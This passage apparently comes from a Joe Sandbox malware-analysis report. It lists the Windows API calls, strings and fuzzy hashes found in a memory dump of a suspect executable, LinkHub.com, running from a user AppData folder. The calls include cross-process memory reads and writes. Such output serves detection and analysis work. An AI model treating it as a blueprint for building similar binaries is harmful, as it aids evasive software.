                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?), ref: 00CD0936
                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?), ref: 00CD0944
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?), ref: 00CD0954
                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?), ref: 00CD0960
                                                                    Similarity
                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3897988419-0
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00CDF2AE
                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00CDF2BC
                                                                    • Sleep.KERNEL32(00000000), ref: 00CDF2C4
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00CDF2CE
                                                                    • Sleep.KERNEL32 ref: 00CDF30A
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    APIs
                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CD1A60
                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A6C
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A7B
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A82
                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CD1A99
                                                                    Similarity
                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 842720411-0
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CD1976
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CD1982
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CD1991
                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00CD1998
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CD19AE
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CD1916
                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CD1922
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CD1931
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CD1938
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CD194E
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CE0B24,?,00CE3D41,?,00000001,00CB3AF4,?), ref: 00CE0CCB
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CE0B24,?,00CE3D41,?,00000001,00CB3AF4,?), ref: 00CE0CD8
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CE0B24,?,00CE3D41,?,00000001,00CB3AF4,?), ref: 00CE0CE5
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CE0B24,?,00CE3D41,?,00000001,00CB3AF4,?), ref: 00CE0CF2
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CE0B24,?,00CE3D41,?,00000001,00CB3AF4,?), ref: 00CE0CFF
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CE0B24,?,00CE3D41,?,00000001,00CB3AF4,?), ref: 00CE0D0C
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00CD65BF
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00CD65D6
                                                                    • MessageBeep.USER32(00000000), ref: 00CD65EE
                                                                    • KillTimer.USER32(?,0000040A), ref: 00CD660A
                                                                    • EndDialog.USER32(?,00000001), ref: 00CD6624
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00CADAD2
                                                                      • Part of subcall function 00CA2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?), ref: 00CA2D4E
                                                                      • Part of subcall function 00CA2D38: GetLastError.KERNEL32(?,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?,?), ref: 00CA2D60
                                                                    • _free.LIBCMT ref: 00CADAE4
                                                                    • _free.LIBCMT ref: 00CADAF6
                                                                    • _free.LIBCMT ref: 00CADB08
                                                                    • _free.LIBCMT ref: 00CADB1A
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00CA262E
                                                                      • Part of subcall function 00CA2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?), ref: 00CA2D4E
                                                                      • Part of subcall function 00CA2D38: GetLastError.KERNEL32(?,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?,?), ref: 00CA2D60
                                                                    • _free.LIBCMT ref: 00CA2640
                                                                    • _free.LIBCMT ref: 00CA2653
                                                                    • _free.LIBCMT ref: 00CA2664
                                                                    • _free.LIBCMT ref: 00CA2675
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __freea$_free
                                                                    • String ID: a/p$am/pm
                                                                    • API String ID: 3432400110-3206640213
                                                                    APIs
                                                                      • Part of subcall function 00CDBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CD2B1D,?,?,00000034,00000800,?,00000034), ref: 00CDBDF4
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00CD30AD
                                                                      • Part of subcall function 00CDBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CD2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00CDBDBF
                                                                      • Part of subcall function 00CDBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00CDBD1C
                                                                      • Part of subcall function 00CDBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CD2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00CDBD2C
                                                                      • Part of subcall function 00CDBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CD2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00CDBD42
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CD311A
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CD3167
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: 87fa549fad0e3257aeacb686834dc67a365882302bc224eceb212a2472126ccf
                                                                    • Instruction ID: bd5cc65d525ab11af7bc9203733088c604d99157d37897924d05c07be87c17c2
                                                                    • Opcode Fuzzy Hash: 87fa549fad0e3257aeacb686834dc67a365882302bc224eceb212a2472126ccf
                                                                    • Instruction Fuzzy Hash: 94412A72900218BEDB10DFA4CD81ADEBBB9EF49700F004096FA55B7285DB706F85DB61
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com,00000104), ref: 00CA1AD9
                                                                    • _free.LIBCMT ref: 00CA1BA4
                                                                    • _free.LIBCMT ref: 00CA1BAE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FileModuleName
                                                                    • String ID: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                    • API String ID: 2506810119-1604394757
                                                                    • Opcode ID: 226a469e4924590325442e9fcd9312c478a2a64b7499ac3aa99721fed2ae243a
                                                                    • Instruction ID: d1ec0d8fbb9764ea0b3553cb80cefb8876414000764f44f6e56f60830b77495d
                                                                    • Opcode Fuzzy Hash: 226a469e4924590325442e9fcd9312c478a2a64b7499ac3aa99721fed2ae243a
                                                                    • Instruction Fuzzy Hash: B23183B5A00219ABCB21DF99DC85D9EBBFCEB86714F1441A6F814D7211E6B04F40E7A4
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00CDCBB1
                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00CDCBF7
                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D429C0,011C56E0), ref: 00CDCC40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem
                                                                    • String ID: 0
                                                                    • API String ID: 135850232-4108050209
                                                                    • Opcode ID: 10590d88ba5c9cb5211b154d6a150e6e00d3225ac572f840f8f998dc009f8ae1
                                                                    • Instruction ID: 8da05e96fa6972efdbd33643dccd7f65b750d2a6af961135d34da256d7e072ad
                                                                    • Opcode Fuzzy Hash: 10590d88ba5c9cb5211b154d6a150e6e00d3225ac572f840f8f998dc009f8ae1
                                                                    • Instruction Fuzzy Hash: 514171712043029FDB20DF24D9C5B5ABBE8AF85714F14461FFAA997391D730E904CB62
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00D0DCD0,00000000,?,?,?,?), ref: 00D04F48
                                                                    • GetWindowLongW.USER32 ref: 00D04F65
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D04F75
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: e2f915a15c61ba57dbc9211d2a2545596dce62e34b2a978f1b88e4531615e8b8
                                                                    • Instruction ID: f614ff9a5e2bfc52500f9f5d9ca47ca436e4c158d3e8be45cfbca80326609e5a
                                                                    • Opcode Fuzzy Hash: e2f915a15c61ba57dbc9211d2a2545596dce62e34b2a978f1b88e4531615e8b8
                                                                    • Instruction Fuzzy Hash: E4317EB1204206AFDB218E78DC45FEA7BA9EF48334F244715FA79E21E0D770AC519760
                                                                    APIs
                                                                      • Part of subcall function 00CF3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00CF3AD4,?,?), ref: 00CF3DD5
                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CF3AD7
                                                                    • _wcslen.LIBCMT ref: 00CF3AF8
                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00CF3B63
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                    • String ID: 255.255.255.255
                                                                    • API String ID: 946324512-2422070025
                                                                    • Opcode ID: 922c45aeff5290065d9c9bc8b390f30ac4be34e41c6889da8d2076037d40ef47
                                                                    • Instruction ID: 4428c342c05ef724e1b5b5c095eec92fc6787e2f3b73712d070e53c0a23ad9ab
                                                                    • Opcode Fuzzy Hash: 922c45aeff5290065d9c9bc8b390f30ac4be34e41c6889da8d2076037d40ef47
                                                                    • Instruction Fuzzy Hash: DC31D339200289AFCB50CF68C4D5E797BE1EF14318F248159EA268B392D731EF42C762
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00D049DC
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00D049F0
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D04A14
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: SysMonthCal32
                                                                    • API String ID: 2326795674-1439706946
                                                                    • Opcode ID: bb5fc6256dd3c7ded8d1aec56388f500d9e8efa8fd95f4c2efa676730c06fde4
                                                                    • Instruction ID: 505fada606039ed820b523337abeb20fb994a71d9d6a490e921fc4039ba88e53
                                                                    • Opcode Fuzzy Hash: bb5fc6256dd3c7ded8d1aec56388f500d9e8efa8fd95f4c2efa676730c06fde4
                                                                    • Instruction Fuzzy Hash: 6921BF72640219ABDF118F94DC42FEB3B69EF48728F150218FB19AB1D0D6B1E855DBA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00D051A3
                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00D051B1
                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D051B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 4014797782-2298589950
                                                                    • Opcode ID: a721cb9c0df018626a422d1194a9d05e90dcd7a1378fdf478dfd24705008be1d
                                                                    • Instruction ID: b2b27eb95e2ef0ef302ea02c18436ce085799e8c75465919bc6a2dd0eb914adb
                                                                    • Opcode Fuzzy Hash: a721cb9c0df018626a422d1194a9d05e90dcd7a1378fdf478dfd24705008be1d
                                                                    • Instruction Fuzzy Hash: 60217CB5600609AFEB10DF64DC81EBB37ADEB5A364B440159F9049B3A1CA70EC11DEB1
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00D042DC
                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00D042EC
                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00D04312
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: a763ee8807e463680d73884dcd3a2bc9c3774e708c2d26fd5759da99230d5099
                                                                    • Instruction ID: 0f18bf6d316c1115c6f84e3bbf43d9c16cd2ab21fc20e61a39bb739f93abadf0
                                                                    • Opcode Fuzzy Hash: a763ee8807e463680d73884dcd3a2bc9c3774e708c2d26fd5759da99230d5099
                                                                    • Instruction Fuzzy Hash: 2C218072610218BBEB118FA4CC85FAF3B6EEF89764F158115FA09AB1D0C6719C5197B0
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00CE544D
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CE54A1
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00D0DCD0), ref: 00CE5515
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume
                                                                    • String ID: %lu
                                                                    • API String ID: 2507767853-685833217
                                                                    • Opcode ID: 6caffd4b512e566a376cc1ddbdc6796da0f5af0669cfa2c2fdf6b6445a8f7e2b
                                                                    • Instruction ID: 64a7253c1bd3da4243c1b74fbd9b9dc3b5120e4b52231e6eb0081cf073a813a7
                                                                    • Opcode Fuzzy Hash: 6caffd4b512e566a376cc1ddbdc6796da0f5af0669cfa2c2fdf6b6445a8f7e2b
                                                                    • Instruction Fuzzy Hash: A0315374A00209AFD711DF54C985EAA77F9EF08308F1480A9F509DB362DB71EE45DB61
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00D04CED
                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00D04D02
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00D04D0F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: f40dfa7e49c748852df6a384f30628edafc49c277dd4d878f7aad66c4e3f7f67
                                                                    • Instruction ID: 2467a8053bc1b44e53744c3d24e63f2e34c3d8096e30627c4cae6b1879b8f86d
                                                                    • Opcode Fuzzy Hash: f40dfa7e49c748852df6a384f30628edafc49c277dd4d878f7aad66c4e3f7f67
                                                                    • Instruction Fuzzy Hash: 7711E0B1240248BEEF205E69CC06FAB3BA8EF85B64F110519FA59E21E0C671DC50DB70
                                                                    APIs
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                      • Part of subcall function 00CD36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00CD3712
                                                                      • Part of subcall function 00CD36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD3723
                                                                      • Part of subcall function 00CD36F4: GetCurrentThreadId.KERNEL32 ref: 00CD372A
                                                                      • Part of subcall function 00CD36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00CD3731
                                                                    • GetFocus.USER32 ref: 00CD38C4
                                                                      • Part of subcall function 00CD373B: GetParent.USER32(00000000), ref: 00CD3746
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00CD390F
                                                                    • EnumChildWindows.USER32(?,00CD3987), ref: 00CD3937
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                    • String ID: %s%d
                                                                    • API String ID: 1272988791-1110647743
                                                                    • Opcode ID: 26bbb726cdfe4c6a9ef89b287899b56eb3650f92b01b831b39a498204d780a8f
                                                                    • Instruction ID: 52aaafd79b425ef6c24bd926427437b36dd88f923b97d71b385a01fb23929b67
                                                                    • Opcode Fuzzy Hash: 26bbb726cdfe4c6a9ef89b287899b56eb3650f92b01b831b39a498204d780a8f
                                                                    • Instruction Fuzzy Hash: 4211EBB16002496BDF01BF749C85AED77AAAF94304F048076BE0D9B392CE719909DB31
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00D06360
                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00D0638D
                                                                    • DrawMenuBar.USER32(?), ref: 00D0639C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$InfoItem$Draw
                                                                    • String ID: 0
                                                                    • API String ID: 3227129158-4108050209
                                                                    • Opcode ID: 7d3d620d3721bc70b0b17df1e20f9c644aaa14144721ff06fd07a666d3cad17e
                                                                    • Instruction ID: 0c0830c15d7bd05960524c06be731d1df350a3b373a73dc41a55ded45c9ffe1f
                                                                    • Opcode Fuzzy Hash: 7d3d620d3721bc70b0b17df1e20f9c644aaa14144721ff06fd07a666d3cad17e
                                                                    • Instruction Fuzzy Hash: BF013931500218AFDB219F51DC88BAEBBB5FF45351F18809AE849D6190DB308A95EF71
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
